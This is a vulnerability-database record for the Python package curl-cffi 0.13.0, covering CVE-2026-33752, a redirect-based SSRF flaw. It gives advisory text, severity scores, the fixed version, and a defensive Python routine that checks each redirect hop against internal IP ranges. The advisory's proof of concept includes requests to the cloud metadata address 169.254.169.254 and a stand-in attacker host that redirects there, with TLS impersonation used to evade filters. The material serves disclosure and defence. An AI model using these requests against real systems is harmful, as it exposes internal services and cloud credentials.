Lookup for vulnerable packages by Package URL.

Purl pkg:pypi/curl-cffi@0.13.0
Type pypi
Namespace
Name curl-cffi
Version 0.13.0
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 0.15.0
Latest_non_vulnerable_version 0.15.0
Affected_by_vulnerabilities
0
url VCID-8hn5-vcby-1yfu
vulnerability_id VCID-8hn5-vcby-1yfu
summary
curl_cffi: Redirect-based SSRF leads to internal network access in curl_cffi (with TLS impersonation bypass)
### Summary
curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.

Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

### Details
The issue comes from how curl_cffi handles outbound requests:
- User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
- Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
- There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can:
- Provide a URL pointing to an attacker-controlled server
- Return a redirect response pointing to an internal service
- Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block.

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

### PoC
1. Direct internal request
```
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
```
2. Redirect to internal service
Attacker server:
```
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
```
Victim code:
```
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
```
Result:
- Initial request goes to attacker server
- Redirect is returned
- libcurl follows the redirect automatically
- Internal metadata endpoint is accessed

3. With TLS impersonation
```
import curl_cffi
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")
```
In some environments, this may help the request bypass TLS-based filtering controls.


### Impact
An attacker who can control the requested URL may be able to:
- Access internal network services
- Reach cloud metadata endpoints and retrieve sensitive information
- Bypass certain outbound filtering mechanisms (depending on environment)

This corresponds to CWE-918 (Server-Side Request Forgery).
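A defender-side check for the gap the Details section names, added here as an example (not part of the advisory and not curl_cffi's own code): redirects are followed at the Python layer and every hop, including the first URL, is vetted against internal ranges before any request is made. The `fetch` callback is an assumption standing in for one non-redirecting request (with curl_cffi's requests-style API, a call made with `allow_redirects=False`); the responses used in the test are constructed.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Destinations an outbound client must never reach from a user-supplied URL:
# loopback, RFC 1918, link-local (cloud metadata lives in 169.254.0.0/16),
# CGNAT, "this network", and the IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def resolve_host(host):
    """Default resolver: every address the name resolves to via DNS."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def is_internal_destination(url, resolver=resolve_host):
    """True if the URL must not be fetched. Fails closed: non-http schemes,
    missing hosts and unresolvable names all count as internal."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    try:
        addrs = {ipaddress.ip_address(parts.hostname)}  # literal IP in the URL
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(parts.hostname)}
        except (socket.gaierror, ValueError):
            return True
    # An IPv4-mapped IPv6 literal such as ::ffff:169.254.169.254 is still IPv4.
    addrs = {(a.ipv4_mapped or a) if a.version == 6 else a for a in addrs}
    return not addrs or any(a in net for a in addrs for net in BLOCKED_NETWORKS)


def fetch_with_checked_redirects(url, fetch, resolver=resolve_host, max_hops=5):
    """Follow redirects at the Python layer, vetting every hop, instead of
    letting libcurl follow them. `fetch(url)` (assumed callback) performs ONE
    request with redirects disabled and returns (status, headers, body)."""
    for _ in range(max_hops + 1):
        if is_internal_destination(url, resolver):
            raise ValueError(f"refusing request to internal destination: {url}")
        status, headers, body = fetch(url)
        location = {k.lower(): v for k, v in headers.items()}.get("location")
        if status not in REDIRECT_STATUSES or not location:
            return url, status, body
        url = urljoin(url, location)  # relative Location headers resolve here
    raise ValueError("too many redirects")
```

The resolver is pluggable so the check can be unit-tested without DNS; in production the default `resolve_host` is used, and the same addresses should be pinned for the actual connection to avoid a DNS rebinding window between check and request.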
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33752
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05896
published_at 2026-06-09T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05922
published_at 2026-06-05T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05913
published_at 2026-06-06T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05915
published_at 2026-06-07T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05871
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33752
1
reference_url https://github.com/lexiforest/curl_cffi
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/lexiforest/curl_cffi
2
reference_url https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-06T15:34:30Z/
url https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33752
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33752
4
reference_url https://github.com/advisories/GHSA-qw2m-4pqf-rmpp
reference_id GHSA-qw2m-4pqf-rmpp
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qw2m-4pqf-rmpp
fixed_packages
0
url pkg:pypi/curl-cffi@0.15.0
purl pkg:pypi/curl-cffi@0.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/curl-cffi@0.15.0
aliases CVE-2026-33752, GHSA-qw2m-4pqf-rmpp
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8hn5-vcby-1yfu
Fixing_vulnerabilities
Risk_score 4.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/curl-cffi@0.13.0